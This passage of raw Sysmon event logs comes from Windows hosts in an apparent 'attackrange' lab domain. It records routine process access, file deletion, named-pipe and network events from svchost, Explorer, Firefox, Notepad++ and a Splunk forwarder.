2\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.851{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.836{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.836{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.836{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:05.836{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.836{466BC892-32D3-60E8-770B-00000000CF01}63564228C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:05.436{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C178A87BC1535DB8272242343E2EC95,SHA256=28F8EAAE1B0EAEF3D8738C0A28F33407F96F4C23FA90C5CA3A17E34D6E5338CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.675{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:06.675{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001049962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:06.653{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-32D3-60E8-770B-00000000CF01}635610232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-32D3-60E8-770B-00000000CF01}635610232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\n
tdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.436{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A997829E66B6DB6FC05590FAB98865DA,SHA256=E6C2143CC17A086134E8FEE910A6C983B6F05E9BB946AFED9A565ABBC114AA32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:06.007{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D560F7A0634E85FB9A956347DE3F2DD6,SHA256=613239458608DEBB289439F16623840CB9D09AAD079748EC900E0F242B33F75D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.305{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.237{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program 
Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001049953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.237{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla 
Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001049952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:55:06.237{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1214.81061823C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001049951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:55:06.237{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1214.81061823C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001049967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:07.437{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BE0C879DF3402A02D1ABBF84FE86C8C,SHA256=26EEACF7B80DD4A5ADB4EFA32AA71C91090572E18E649860CD8D785361B6EC8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:05.311{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57301-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:07.022{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F854BA2E7DBC4D27D87708FA2C29F3C,SHA256=7B07C9CC9087CEF505D9B6CBD3E6F033E59379C7AC6F7C1EEDD13CAFD6EBD116,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:07.006{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075428MD5=5BEE8ECB07A38ED4E6739819036B602D,SHA256=4DE1D22F8A87DFCDCD674F842B5E7A496548EE74FBC0DF9C41EE198563227FCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:07.006{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Program Files\ansible\AttackRangeSysmon.xmlMD5=FB65D6C1F8C0BBD38377AE359F2DD61A,SHA256=3BD9132356DA74C4826ED4866ECB3DDF33ADCB463C274422A80FF45C746C36EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:08.452{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 